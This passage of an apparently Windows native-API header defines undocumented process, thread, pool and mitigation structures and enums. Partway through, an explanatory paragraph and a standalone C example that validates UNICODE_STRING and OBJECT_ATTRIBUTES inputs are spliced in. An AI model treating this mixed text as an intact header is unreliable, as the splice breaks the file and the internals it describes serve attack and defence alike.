StateStandby, StateTerminated, StateWait, StateTransition, StateUnknown } THREAD_STATE; typedef enum _KWAIT_REASON { Executive = 0, FreePage, PageIn, PoolAllocation, DelayExecution, Suspended, UserRequest, WrExecutive, WrFreePage, WrPageIn, WrPoolAllocation, WrDelayExecution, WrSuspended, WrUserRequest, WrEventPair, //has no effect after 7 WrQueue, WrLpcReceive, WrLpcReply, WrVirtualMemory, WrPageOut, WrRendezvous, WrKeyedEvent, WrTerminated, WrProcessInSwap, WrCpuRateControl, WrCalloutStack, WrKernel, WrResource, WrPushLock, WrMutex, WrQuantumEnd, WrDispatchInt, WrPreempted, WrYieldExecution, WrFastMutex, WrGuardedMutex, WrRundown, WrAlertByThreadId, WrDeferredPreempt, WrPhysicalFault, WrIoRing, WrMdlCache, WrRcu, MaximumWaitReason } KWAIT_REASON; typedef VOID KSTART_ROUTINE( _In_ PVOID StartContext ); typedef KSTART_ROUTINE *PKSTART_ROUTINE; 
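The UNICODE_STRING, OBJECT_ATTRIBUTES and RTL_CONSTANT_STRING declarations above are the shape every native API call takes, and their two classic traps are Length (bytes, terminator excluded, Buffer not necessarily NUL-terminated) and attribute bits outside OBJ_VALID_ATTRIBUTES. The block below is an added example, not UACME code: it rebuilds those macros on stand-in types so it compiles outside Windows, and shows the checks a receiver of an untrusted UNICODE_STRING or OBJECT_ATTRIBUTES would apply; the object name is constructed, and the C declaration of _RTL_CONSTANT_STRING_type_check is assumed from the part of the header not shown here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in SDK types so this builds outside Windows (example only; the real
 * header takes them from ntdef.h). WCHAR must be 16-bit for the byte maths. */
typedef unsigned short USHORT;
typedef uint32_t ULONG;
typedef uint_least16_t WCHAR;
typedef WCHAR *PWSTR;
typedef void *PVOID, *HANDLE;
_Static_assert(sizeof(WCHAR) == 2, "WCHAR must be a 16-bit code unit");

/* UNICODE_STRING and OBJECT_ATTRIBUTES, same layout as declared in the header. */
typedef struct _UNICODE_STRING {
    USHORT Length;        /* bytes in use, terminator NOT included */
    USHORT MaximumLength; /* bytes available in Buffer */
    PWSTR Buffer;         /* need not be NUL-terminated */
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

/* The header's macros, reproduced. _RTL_CONSTANT_STRING_type_check is the C
 * declaration ntdef.h uses (assumed here; it lives outside this excerpt). It is
 * never called: sizeof() of the call is 1, so MaximumLength == sizeof(s). */
char _RTL_CONSTANT_STRING_type_check(const void *s);
#define _RTL_CONSTANT_STRING_remove_const_macro(s) (s)
#define RTL_CONSTANT_STRING(s) \
    { sizeof(s) - sizeof((s)[0]), sizeof(s) / sizeof(_RTL_CONSTANT_STRING_type_check(s)), \
      _RTL_CONSTANT_STRING_remove_const_macro(s) }
#define RTL_CONST_CAST(type) (type)
#define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) \
    { sizeof(OBJECT_ATTRIBUTES), NULL, RTL_CONST_CAST(PUNICODE_STRING)(n), a, NULL, NULL }
#define OBJ_CASE_INSENSITIVE  0x00000040L
#define OBJ_VALID_ATTRIBUTES  0x00001FF2L
#define MAXUSHORT             0xffff
#define MAX_USTRING           (sizeof(WCHAR) * (MAXUSHORT / sizeof(WCHAR)))

/* Constructed sample object name (30 characters; not a real object anywhere). */
static UNICODE_STRING g_ExampleName = RTL_CONSTANT_STRING(u"\\BaseNamedObjects\\ExampleEvent");
static OBJECT_ATTRIBUTES g_ExampleAttributes =
    RTL_CONSTANT_OBJECT_ATTRIBUTES(&g_ExampleName, OBJ_CASE_INSENSITIVE);

const UNICODE_STRING *GetExampleName(void) { return &g_ExampleName; }
const OBJECT_ATTRIBUTES *GetExampleAttributes(void) { return &g_ExampleAttributes; }

/* Checks a receiver should apply to a UNICODE_STRING from an untrusted caller
 * (RPC/ALPC client, another process) before dereferencing Buffer. */
int IsValidUnicodeString(const UNICODE_STRING *s)
{
    if (s == NULL) return 0;
    if ((s->Length | s->MaximumLength) & 1) return 0;   /* whole WCHARs only */
    if (s->Length > s->MaximumLength) return 0;
    if (s->MaximumLength > MAX_USTRING) return 0;
    if (s->Buffer == NULL && s->Length != 0) return 0;
    return 1;
}

/* Length is in bytes: the character count is Length / sizeof(WCHAR). */
size_t UnicodeStringCharCount(const UNICODE_STRING *s)
{
    return s->Length / sizeof(WCHAR);
}

/* Safe copy into a NUL-terminated buffer; never wcslen() a UNICODE_STRING. */
int UnicodeStringToBuffer(const UNICODE_STRING *s, WCHAR *out, size_t outChars)
{
    if (!IsValidUnicodeString(s)) return 0;
    size_t n = UnicodeStringCharCount(s);
    if (out == NULL || n + 1 > outChars) return 0;       /* room for the terminator */
    memcpy(out, s->Buffer, s->Length);
    out[n] = 0;
    return 1;
}

/* Rejects a wrong Length, a bad name, and attribute bits outside the header's
 * OBJ_VALID_ATTRIBUTES (OBJ_PROTECT_CLOSE 0x1 and OBJ_AUDIT_OBJECT_CLOSE 0x4 are
 * handle flags, which is why the mask leaves them out). */
int AreObjectAttributesValid(const OBJECT_ATTRIBUTES *oa)
{
    if (oa == NULL || oa->Length != sizeof(OBJECT_ATTRIBUTES)) return 0;
    if (oa->Attributes & ~(ULONG)OBJ_VALID_ATTRIBUTES) return 0;
    if (oa->ObjectName != NULL && !IsValidUnicodeString(oa->ObjectName)) return 0;
    return 1;
}

/* Copies the sample name into a static buffer; returns NULL on failure. */
const WCHAR *ExampleNameAsCString(void)
{
    static WCHAR buffer[64];
    return UnicodeStringToBuffer(&g_ExampleName, buffer, 64) ? buffer : NULL;
}

int main(void)
{
    const UNICODE_STRING *n = GetExampleName();
    printf("Length=%u bytes, MaximumLength=%u bytes, %zu chars, valid=%d\n",
           n->Length, n->MaximumLength, UnicodeStringCharCount(n), IsValidUnicodeString(n));
    printf("OBJECT_ATTRIBUTES valid=%d\n", AreObjectAttributesValid(GetExampleAttributes()));
    return 0;
}
```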
typedef struct _CLIENT_ID {
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID, *PCLIENT_ID;

typedef struct _CLIENT_ID64 {
    ULONG64 UniqueProcess;
    ULONG64 UniqueThread;
} CLIENT_ID64, *PCLIENT_ID64;

typedef struct _CLIENT_ID32 {
    ULONG32 UniqueProcess;
    ULONG32 UniqueThread;
} CLIENT_ID32, *PCLIENT_ID32;

typedef struct _VM_COUNTERS {
    SIZE_T PeakVirtualSize;
    SIZE_T VirtualSize;
    ULONG PageFaultCount;
    SIZE_T PeakWorkingSetSize;
    SIZE_T WorkingSetSize;
    SIZE_T QuotaPeakPagedPoolUsage;
    SIZE_T QuotaPagedPoolUsage;
    SIZE_T QuotaPeakNonPagedPoolUsage;
    SIZE_T QuotaNonPagedPoolUsage;
    SIZE_T PagefileUsage;
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
} VM_COUNTERS;

typedef struct _SYSTEM_THREAD_INFORMATION {
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER CreateTime;
    ULONG WaitTime;
    PVOID StartAddress;
    CLIENT_ID ClientId;
    KPRIORITY Priority;
    KPRIORITY BasePriority;
    ULONG ContextSwitchCount;
    THREAD_STATE State;
    KWAIT_REASON WaitReason;
} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;

typedef struct _SYSTEM_EXTENDED_THREAD_INFORMATION {
    SYSTEM_THREAD_INFORMATION ThreadInfo;
    PVOID StackBase;
    PVOID StackLimit;
    PVOID Win32StartAddress;
    PVOID TebBase;
    ULONG_PTR Reserved2;
    ULONG_PTR Reserved3;
    ULONG_PTR Reserved4;
} SYSTEM_EXTENDED_THREAD_INFORMATION, *PSYSTEM_EXTENDED_THREAD_INFORMATION;

typedef struct _SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryDelta;
    ULONG ThreadCount;
    LARGE_INTEGER WorkingSetPrivateSize;
    ULONG HardFaultCount;
    ULONG NumberOfThreadsHighWatermark;
    ULONGLONG CycleTime;
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    KPRIORITY BasePriority;
    HANDLE UniqueProcessId;
    HANDLE InheritedFromUniqueProcessId;
    ULONG HandleCount;
    ULONG SessionId;
    ULONG_PTR UniqueProcessKey;
    VM_COUNTERS VmCounters;
    IO_COUNTERS IoCounters;
    SYSTEM_THREAD_INFORMATION Threads[1]; //not a part of this structure
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;

typedef enum _SYSTEM_PROCESS_CLASSIFICATION {
    SystemProcessClassificationNormal,
    SystemProcessClassificationSystem,
    SystemProcessClassificationSecureSystem,
    SystemProcessClassificationMemCompression,
    SystemProcessClassificationRegistry,
    SystemProcessClassificationMaximum
} SYSTEM_PROCESS_CLASSIFICATION;

typedef struct _PROCESS_DISK_COUNTERS {
    ULONGLONG BytesRead;
    ULONGLONG BytesWritten;
    ULONGLONG ReadOperationCount;
    ULONGLONG WriteOperationCount;
    ULONGLONG FlushOperationCount;
} PROCESS_DISK_COUNTERS, *PPROCESS_DISK_COUNTERS;

typedef union _ENERGY_STATE_DURATION {
    union {
        ULONGLONG Value;
        ULONG LastChangeTime;
    };
    ULONG Duration : 31;
    ULONG IsInState : 1;
} ENERGY_STATE_DURATION, *PENERGY_STATE_DURATION;

typedef struct _PROCESS_ENERGY_VALUES {
    ULONGLONG Cycles[2][4];
    ULONGLONG DiskEnergy;
    ULONGLONG NetworkTailEnergy;
    ULONGLONG MBBTailEnergy;
    ULONGLONG NetworkTxRxBytes;
    ULONGLONG MBBTxRxBytes;
    union {
        ENERGY_STATE_DURATION Durations[3];
        struct {
            ENERGY_STATE_DURATION ForegroundDuration;
            ENERGY_STATE_DURATION DesktopVisibleDuration;
            ENERGY_STATE_DURATION PSMForegroundDuration;
        };
    };
    ULONG CompositionRendered;
    ULONG CompositionDirtyGenerated;
    ULONG CompositionDirtyPropagated;
    ULONG Reserved1;
    ULONGLONG AttributedCycles[4][2];
    ULONGLONG WorkOnBehalfCycles[4][2];
} PROCESS_ENERGY_VALUES, *PPROCESS_ENERGY_VALUES;

typedef struct _SYSTEM_PROCESS_INFORMATION_EXTENSION {
    PROCESS_DISK_COUNTERS DiskCounters;
    ULONGLONG ContextSwitches;
    union {
        ULONG Flags;
        struct {
            ULONG HasStrongId : 1;
            ULONG Classification : 4; // SYSTEM_PROCESS_CLASSIFICATION
            ULONG BackgroundActivityModerated : 1;
            ULONG Spare : 26;
        };
    };
    ULONG UserSidOffset;
    ULONG PackageFullNameOffset;
    PROCESS_ENERGY_VALUES EnergyValues;
    ULONG AppIdOffset;
    SIZE_T SharedCommitCharge;
    ULONG JobObjectId;
    ULONG SpareUlong;
    ULONGLONG ProcessSequenceNumber;
} SYSTEM_PROCESS_INFORMATION_EXTENSION, *PSYSTEM_PROCESS_INFORMATION_EXTENSION;

typedef struct _SYSTEM_PROCESS_FULL_INFORMATION {
    SYSTEM_PROCESS_INFORMATION ProcessAndThreads;
    SYSTEM_PROCESS_INFORMATION_EXTENSION ExtendedInfo;
} SYSTEM_PROCESS_FULL_INFORMATION, *PSYSTEM_PROCESS_FULL_INFORMATION;

typedef struct _SYSTEM_PROCESS_ID_INFORMATION {
    HANDLE ProcessId;
    UNICODE_STRING ImageName;
} SYSTEM_PROCESS_ID_INFORMATION, *PSYSTEM_PROCESS_ID_INFORMATION;

typedef struct _SYSTEM_SECUREBOOT_INFORMATION {
    BOOLEAN SecureBootEnabled;
    BOOLEAN SecureBootCapable;
} SYSTEM_SECUREBOOT_INFORMATION, *PSYSTEM_SECUREBOOT_INFORMATION;

typedef struct _SYSTEM_SECUREBOOT_POLICY_INFORMATION {
    GUID PolicyPublisher;
    ULONG PolicyVersion;
    ULONG PolicyOptions;
} SYSTEM_SECUREBOOT_POLICY_INFORMATION, *PSYSTEM_SECUREBOOT_POLICY_INFORMATION;

typedef struct _SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION {
    SYSTEM_SECUREBOOT_POLICY_INFORMATION PolicyInformation;
    ULONG PolicySize;
    UCHAR Policy[1];
} SYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION, *PSYSTEM_SECUREBOOT_POLICY_FULL_INFORMATION;

typedef struct _SYSTEM_BASIC_INFORMATION {
    ULONG Reserved;
    ULONG TimerResolution;
    ULONG PageSize;
    ULONG NumberOfPhysicalPages;
    ULONG LowestPhysicalPageNumber;
    ULONG HighestPhysicalPageNumber;
    ULONG AllocationGranularity;
    ULONG_PTR MinimumUserModeAddress;
    ULONG_PTR MaximumUserModeAddress;
    ULONG_PTR ActiveProcessorsAffinityMask;
    CCHAR NumberOfProcessors;
} SYSTEM_BASIC_INFORMATION, *PSYSTEM_BASIC_INFORMATION;

typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION {
    BOOLEAN SecureKernelRunning : 1;
    BOOLEAN HvciEnabled : 1;
    BOOLEAN HvciStrictMode : 1;
    BOOLEAN DebugEnabled : 1;
    BOOLEAN FirmwarePageProtection : 1;
    BOOLEAN EncryptionKeyAvailable : 1;
    BOOLEAN SpareFlags : 2;
    BOOLEAN TrustletRunning : 1;
    BOOLEAN HvciDisableAllowed : 1;
    BOOLEAN HardwareEnforcedVbs : 1;
    BOOLEAN NoSecrets : 1;
    BOOLEAN EncryptionKeyPersistent : 1;
    BOOLEAN HardwareEnforcedHvpt : 1;
    BOOLEAN HardwareHvptAvailable : 1;
    BOOLEAN SpareFlags2 : 1;
    BOOLEAN Spare0[6];
    ULONGLONG Spare1;
} SYSTEM_ISOLATED_USER_MODE_INFORMATION, *PSYSTEM_ISOLATED_USER_MODE_INFORMATION;

typedef struct _SYSTEM_PROCESSOR_FEATURES_INFORMATION { //chappell
    ULONGLONG ProcessorFeatureBits;
    ULONGLONG Reserved[3];
} SYSTEM_PROCESSOR_FEATURES_INFORMATION, * PSYSTEM_PROCESSOR_FEATURES_INFORMATION;

typedef struct _SYSTEM_POOL_ENTRY {
    BOOLEAN Allocated;
    BOOLEAN Spare0;
    USHORT AllocatorBackTraceIndex;
    ULONG Size;
    union {
        UCHAR Tag[4];
        ULONG TagUlong;
        PVOID ProcessChargedQuota;
    };
} SYSTEM_POOL_ENTRY, * PSYSTEM_POOL_ENTRY;

typedef struct _SYSTEM_POOL_INFORMATION {
    SIZE_T TotalSize;
    PVOID FirstEntry;
    USHORT EntryOverhead;
    BOOLEAN PoolTagPresent;
    BOOLEAN Spare0;
    ULONG NumberOfEntries;
    SYSTEM_POOL_ENTRY Entries[1];
} SYSTEM_POOL_INFORMATION, * PSYSTEM_POOL_INFORMATION;

typedef struct _SYSTEM_POOLTAG {
    union {
        UCHAR Tag[4];
        ULONG TagUlong;
    };
    ULONG PagedAllocs;
    ULONG PagedFrees;
    SIZE_T PagedUsed;
    ULONG NonPagedAllocs;
    ULONG NonPagedFrees;
    SIZE_T NonPagedUsed;
} SYSTEM_POOLTAG, * PSYSTEM_POOLTAG;

typedef struct _SYSTEM_BIGPOOL_ENTRY {
    union {
        PVOID VirtualAddress;
        ULONG_PTR NonPaged : 1;
    };
    SIZE_T SizeInBytes;
    union {
        UCHAR Tag[4];
        ULONG TagUlong;
    };
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;

typedef struct _SYSTEM_POOLTAG_INFORMATION {
    ULONG Count;
    SYSTEM_POOLTAG TagInfo[1];
} SYSTEM_POOLTAG_INFORMATION, * PSYSTEM_POOLTAG_INFORMATION;

typedef struct _SYSTEM_SESSION_POOLTAG_INFORMATION {
    SIZE_T NextEntryOffset;
    ULONG SessionId;
    ULONG Count;
    SYSTEM_POOLTAG TagInfo[1];
} SYSTEM_SESSION_POOLTAG_INFORMATION, * PSYSTEM_SESSION_POOLTAG_INFORMATION;

typedef struct _SYSTEM_BIGPOOL_INFORMATION {
    ULONG Count;
    SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;

typedef struct _SYSTEM_FIRMWARE_PARTITION_INFORMATION {
    UNICODE_STRING FirmwarePartition; // \Device\HarddiskX
} SYSTEM_FIRMWARE_PARTITION_INFORMATION, * PSYSTEM_FIRMWARE_PARTITION_INFORMATION;

typedef struct _RTL_PROCESS_BACKTRACE_INFORMATION {
    PCHAR SymbolicBackTrace;
    ULONG TraceCount;
    USHORT Index;
    USHORT Depth;
    PVOID BackTrace[32];
} RTL_PROCESS_BACKTRACE_INFORMATION, * PRTL_PROCESS_BACKTRACE_INFORMATION;

typedef struct _RTL_PROCESS_BACKTRACES {
    ULONG CommittedMemory;
    ULONG ReservedMemory;
    ULONG NumberOfBackTraceLookups;
    ULONG NumberOfBackTraces;
    RTL_PROCESS_BACKTRACE_INFORMATION BackTraces[1];
} RTL_PROCESS_BACKTRACES, * PRTL_PROCESS_BACKTRACES;

typedef enum _PROCESSINFOCLASS {
    ProcessBasicInformation = 0,
    ProcessQuotaLimits = 1,
    ProcessIoCounters = 2,
    ProcessVmCounters = 3,
    ProcessTimes = 4,
    ProcessBasePriority = 5,
    ProcessRaisePriority = 6,
    ProcessDebugPort = 7,
    ProcessExceptionPort = 8,
    ProcessAccessToken = 9,
    ProcessLdtInformation = 10,
    ProcessLdtSize = 11,
    ProcessDefaultHardErrorMode = 12,
    ProcessIoPortHandlers = 13,
    ProcessPooledUsageAndLimits = 14,
    ProcessWorkingSetWatch = 15,
    ProcessUserModeIOPL = 16,
    ProcessEnableAlignmentFaultFixup = 17,
    ProcessPriorityClass = 18,
    ProcessWx86Information = 19,
    ProcessHandleCount = 20,
    ProcessAffinityMask = 21,
    ProcessPriorityBoost = 22,
    ProcessDeviceMap = 23,
    ProcessSessionInformation = 24,
    ProcessForegroundInformation = 25,
    ProcessWow64Information = 26,
    ProcessImageFileName = 27,
    ProcessLUIDDeviceMapsEnabled = 28,
    ProcessBreakOnTermination = 29,
    ProcessDebugObjectHandle = 30,
    ProcessDebugFlags = 31,
    ProcessHandleTracing = 32,
    ProcessIoPriority = 33,
    ProcessExecuteFlags = 34,
    ProcessTlsInformation = 35,
    ProcessCookie = 36,
    ProcessImageInformation = 37,
    ProcessCycleTime = 38,
    ProcessPagePriority = 39,
    ProcessInstrumentationCallback = 40,
    ProcessThreadStackAllocation = 41,
    ProcessWorkingSetWatchEx = 42,
    ProcessImageFileNameWin32 = 43,
    ProcessImageFileMapping = 44,
    ProcessAffinityUpdateMode = 45,
    ProcessMemoryAllocationMode = 46,
    ProcessGroupInformation = 47,
    ProcessTokenVirtualizationEnabled = 48,
    ProcessConsoleHostProcess = 49, //ProcessOwnerInformation
    ProcessWindowInformation = 50,
    ProcessHandleInformation = 51,
    ProcessMitigationPolicy = 52,
    ProcessDynamicFunctionTableInformation = 53,
    ProcessHandleCheckingMode = 54,
    ProcessKeepAliveCount = 55,
    ProcessRevokeFileHandles = 56,
    ProcessWorkingSetControl = 57,
    ProcessHandleTable = 58,
    ProcessCheckStackExtentsMode = 59,
    ProcessCommandLineInformation = 60,
    ProcessProtectionInformation = 61,
    ProcessMemoryExhaustion = 62,
    ProcessFaultInformation = 63,
    ProcessTelemetryIdInformation = 64,
    ProcessCommitReleaseInformation = 65,
    ProcessDefaultCpuSetsInformation = 66,
    ProcessAllowedCpuSetsInformation = 67,
    ProcessSubsystemProcess = 68,
    ProcessJobMemoryInformation = 69,
    ProcessInPrivate = 70,
    ProcessRaiseUMExceptionOnInvalidHandleClose = 71,
    ProcessIumChallengeResponse = 72,
    ProcessChildProcessInformation = 73,
    ProcessHighGraphicsPriorityInformation = 74,
    ProcessSubsystemInformation = 75,
    ProcessEnergyValues = 76,
    ProcessActivityThrottleState = 77,
    ProcessActivityThrottlePolicy = 78,
    ProcessWin32kSyscallFilterInformation = 79,
    ProcessDisableSystemAllowedCpuSets = 80,
    ProcessWakeInformation = 81,
    ProcessEnergyTrackingState = 82,
    ProcessManageWritesToExecutableMemory = 83,
    ProcessCaptureTrustletLiveDump = 84,
    ProcessTelemetryCoverage = 85,
    ProcessEnclaveInformation = 86,
    ProcessEnableReadWriteVmLogging = 87,
    ProcessUptimeInformation = 88,
    ProcessImageSection = 89,
    ProcessDebugAuthInformation = 90,
    ProcessSystemResourceManagement = 91,
    ProcessSequenceNumber = 92,
    ProcessLoaderDetour = 93,
    ProcessSecurityDomainInformation = 94,
    ProcessCombineSecurityDomainsInformation = 95,
    ProcessEnableLogging = 96,
    ProcessLeapSecondInformation = 97,
    ProcessFiberShadowStackAllocation = 98,
    ProcessFreeFiberShadowStackAllocation = 99,
    ProcessAltSystemCallInformation = 100,
    ProcessDynamicEHContinuationTargets = 101,
    ProcessDynamicEnforcedCetCompatibleRanges = 102,
    ProcessCreateStateChange = 103,
    ProcessApplyStateChange = 104,
    ProcessEnableOptionalXStateFeatures = 105,
    ProcessAltPrefetchParam = 106,
    ProcessAssignCpuPartitions = 107,
    ProcessPriorityClassEx = 108,
    ProcessMembershipInformation = 109,
    ProcessEffectiveIoPriority = 110,
    ProcessEffectivePagePriority = 111,
    ProcessSchedulerSharedData = 112,
    ProcessSlistRollbackInformation = 113,
    ProcessNetworkIoCounters = 114,
    ProcessFindFirstThreadByTebValue = 115,
    ProcessEnclaveAddressSpaceRestriction = 116,
    ProcessAvailableCpus = 117,
    MaxProcessInfoClass
} PROCESSINFOCLASS;

typedef enum _THREADINFOCLASS {
    ThreadBasicInformation,
    ThreadTimes,
    ThreadPriority,
    ThreadBasePriority,
    ThreadAffinityMask,
    ThreadImpersonationToken,
    ThreadDescriptorTableEntry,
    ThreadEnableAlignmentFaultFixup,
    ThreadEventPair,
    ThreadQuerySetWin32StartAddress,
    ThreadZeroTlsCell,
    ThreadPerformanceCount,
    ThreadAmILastThread,
    ThreadIdealProcessor,
    ThreadPriorityBoost,
    ThreadSetTlsArrayAddress,
    ThreadIsIoPending,
    ThreadHideFromDebugger,
    ThreadBreakOnTermination,
    ThreadSwitchLegacyState,
    ThreadIsTerminated,
    ThreadLastSystemCall,
    ThreadIoPriority,
    ThreadCycleTime,
    ThreadPagePriority,
    ThreadActualBasePriority,
    ThreadTebInformation,
    ThreadCSwitchMon,
    ThreadCSwitchPmu,
    ThreadWow64Context,
    ThreadGroupInformation,
    ThreadUmsInformation,
    ThreadCounterProfiling,
    ThreadIdealProcessorEx,
    ThreadCpuAccountingInformation,
    ThreadSuspendCount,
    ThreadHeterogeneousCpuPolicy,
    ThreadContainerId,
    ThreadNameInformation,
    ThreadSelectedCpuSets,
    ThreadSystemThreadInformation,
    ThreadActualGroupAffinity,
    ThreadDynamicCodePolicyInfo,
    ThreadExplicitCaseSensitivity,
    ThreadWorkOnBehalfTicket,
    ThreadSubsystemInformation,
    ThreadDbgkWerReportActive,
    ThreadAttachContainer,
    ThreadManageWritesToExecutableMemory,
    ThreadPowerThrottlingState,
    ThreadWorkloadClass,
    ThreadCreateStateChange,
    ThreadApplyStateChange,
    ThreadStrongerBadHandleChecks,
    ThreadEffectiveIoPriority,
    ThreadEffectivePagePriority,
    ThreadUpdateLockOwnership,
    ThreadSchedulerSharedDataSlot,
    ThreadTebInformationAtomic,
    ThreadIndexInformation,
    MaxThreadInfoClass
} THREADINFOCLASS;

typedef struct _PROCESS_BASIC_INFORMATION {
    NTSTATUS ExitStatus;
    PVOID PebBaseAddress;
    ULONG_PTR AffinityMask;
    KPRIORITY BasePriority;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;

typedef struct _THREAD_BASIC_INFORMATION {
    NTSTATUS ExitStatus;
    PVOID TebBaseAddress;
    CLIENT_ID ClientId;
    ULONG_PTR AffinityMask;
    KPRIORITY Priority;
    LONG BasePriority;
} THREAD_BASIC_INFORMATION, *PTHREAD_BASIC_INFORMATION;

// taken from ph2(whatever)
typedef struct _THREAD_LAST_SYSCALL_INFORMATION {
    PVOID FirstArgument;
    USHORT SystemCallNumber;
#ifdef WIN64
    USHORT Pad[0x3]; // since REDSTONE2
#else
    USHORT Pad[0x1]; // since REDSTONE2
#endif
    ULONG64 WaitTime;
} THREAD_LAST_SYSCALL_INFORMATION, * PTHREAD_LAST_SYSCALL_INFORMATION;

typedef struct _THREAD_NAME_INFORMATION {
    UNICODE_STRING ThreadName;
} THREAD_NAME_INFORMATION, * PTHREAD_NAME_INFORMATION;

typedef struct _PROCESS_EXTENDED_BASIC_INFORMATION {
    SIZE_T Size;
    PROCESS_BASIC_INFORMATION BasicInfo;
    union {
        ULONG Flags;
        struct {
            ULONG IsProtectedProcess : 1;
            ULONG IsWow64Process : 1;
            ULONG IsProcessDeleting : 1;
            ULONG IsCrossSessionCreate : 1;
            ULONG IsFrozen : 1;
            ULONG IsBackground : 1;
            ULONG IsStronglyNamed : 1;
            ULONG IsSecureProcess : 1;
            ULONG IsSubsystemProcess : 1;
            ULONG SpareBits : 23;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION;

typedef struct _PROCESS_ACCESS_TOKEN {
    HANDLE Token;
    HANDLE Thread;
} PROCESS_ACCESS_TOKEN, *PPROCESS_ACCESS_TOKEN;

typedef struct _PROCESS_HANDLE_TABLE_ENTRY_INFO {
    HANDLE HandleValue;
    ULONG_PTR HandleCount;
    ULONG_PTR PointerCount;
    ULONG GrantedAccess;
    ULONG ObjectTypeIndex;
    ULONG HandleAttributes;
    ULONG Reserved;
} PROCESS_HANDLE_TABLE_ENTRY_INFO, *PPROCESS_HANDLE_TABLE_ENTRY_INFO;

typedef struct _PROCESS_HANDLE_SNAPSHOT_INFORMATION {
    ULONG_PTR NumberOfHandles;
    ULONG_PTR Reserved;
    PROCESS_HANDLE_TABLE_ENTRY_INFO Handles[1];
} PROCESS_HANDLE_SNAPSHOT_INFORMATION, *PPROCESS_HANDLE_SNAPSHOT_INFORMATION;

typedef enum _PROCESS_STATE_CHANGE_TYPE {
    ProcessStateChangeSuspend,
    ProcessStateChangeResume,
    ProcessStateChangeMax,
} PROCESS_STATE_CHANGE_TYPE, *PPROCESS_STATE_CHANGE_TYPE;

typedef enum _THREAD_STATE_CHANGE_TYPE {
    ThreadStateChangeSuspend,
    ThreadStateChangeResume,
    ThreadStateChangeMax,
} THREAD_STATE_CHANGE_TYPE, *PTHREAD_STATE_CHANGE_TYPE;

//
// Process/Thread System and User Time
//  NtQueryInformationProcess using ProcessTimes
//  NtQueryInformationThread using ThreadTimes
//
typedef struct _KERNEL_USER_TIMES {
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER ExitTime;
    LARGE_INTEGER KernelTime;
    LARGE_INTEGER UserTime;
} KERNEL_USER_TIMES, *PKERNEL_USER_TIMES;

typedef enum _PS_MITIGATION_OPTION {
    PS_MITIGATION_OPTION_NX,
    PS_MITIGATION_OPTION_SEHOP,
    PS_MITIGATION_OPTION_FORCE_RELOCATE_IMAGES,
    PS_MITIGATION_OPTION_HEAP_TERMINATE,
    PS_MITIGATION_OPTION_BOTTOM_UP_ASLR,
    PS_MITIGATION_OPTION_HIGH_ENTROPY_ASLR,
    PS_MITIGATION_OPTION_STRICT_HANDLE_CHECKS,
    PS_MITIGATION_OPTION_WIN32K_SYSTEM_CALL_DISABLE,
    PS_MITIGATION_OPTION_EXTENSION_POINT_DISABLE,
    PS_MITIGATION_OPTION_PROHIBIT_DYNAMIC_CODE,
    PS_MITIGATION_OPTION_CONTROL_FLOW_GUARD,
    PS_MITIGATION_OPTION_BLOCK_NON_MICROSOFT_BINARIES,
    PS_MITIGATION_OPTION_FONT_DISABLE,
    PS_MITIGATION_OPTION_IMAGE_LOAD_NO_REMOTE,
    PS_MITIGATION_OPTION_IMAGE_LOAD_NO_LOW_LABEL,
    PS_MITIGATION_OPTION_IMAGE_LOAD_PREFER_SYSTEM32,
    PS_MITIGATION_OPTION_RETURN_FLOW_GUARD,
    PS_MITIGATION_OPTION_LOADER_INTEGRITY_CONTINUITY,
    PS_MITIGATION_OPTION_STRICT_CONTROL_FLOW_GUARD,
    PS_MITIGATION_OPTION_RESTRICT_SET_THREAD_CONTEXT,
    PS_MITIGATION_OPTION_ROP_STACKPIVOT,
    PS_MITIGATION_OPTION_ROP_CALLER_CHECK,
    PS_MITIGATION_OPTION_ROP_SIMEXEC,
    PS_MITIGATION_OPTION_EXPORT_ADDRESS_FILTER,
    PS_MITIGATION_OPTION_EXPORT_ADDRESS_FILTER_PLUS,
    PS_MITIGATION_OPTION_RESTRICT_CHILD_PROCESS_CREATION,
    PS_MITIGATION_OPTION_IMPORT_ADDRESS_FILTER,
    PS_MITIGATION_OPTION_MODULE_TAMPERING_PROTECTION,
    PS_MITIGATION_OPTION_RESTRICT_INDIRECT_BRANCH_PREDICTION,
    PS_MITIGATION_OPTION_SPECULATIVE_STORE_BYPASS_DISABLE,
    PS_MITIGATION_OPTION_ALLOW_DOWNGRADE_DYNAMIC_CODE_POLICY,
    PS_MITIGATION_OPTION_CET_SHADOW_STACKS,
    PS_MITIGATION_OPTION_USER_CET_SET_CONTEXT_IP_VALIDATION,
    PS_MITIGATION_OPTION_BLOCK_NON_CET_BINARIES,
    PS_MITIGATION_OPTION_CET_DYNAMIC_APIS_OUT_OF_PROC_ONLY,
    PS_MITIGATION_OPTION_REDIRECTION_TRUST,
